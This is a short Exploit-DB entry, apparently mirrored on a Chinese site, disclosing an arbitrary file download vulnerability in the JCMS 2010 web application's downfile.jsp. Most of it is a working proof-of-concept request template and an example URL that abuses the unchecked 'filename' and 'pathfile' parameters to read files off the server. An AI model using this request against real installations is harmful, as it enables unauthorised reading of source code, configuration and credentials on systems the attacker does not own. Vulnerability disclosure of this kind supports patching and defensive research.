JCMS 2010 – File Download

• Exploit Database
• 122 阅读

• 作者： Beach
  日期： 2010-11-22
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/15596/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  ##################################################################################################### #Title: JCMS 2010 File Download Vulnerability #Date:2010-11-22 #Author:Beach #Team:http://www.linux520.com/ #Vendor:http://www.hanweb.com/ #Language:Java #Greetz:Brother ##################################################################################################### [*]Description:   In /module/download/downfile.jsp ,filename and pathfile didn't verify user's input So this vulnerability allows an attacker to download any files . ##################################################################################################### [*]POC:   http://server/module/download/downfile.jsp?filename=[file_name]&pathfile=[Path/Path/file_name] ##################################################################################################### [*]I.E:   http://server/module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp #####################################################################################################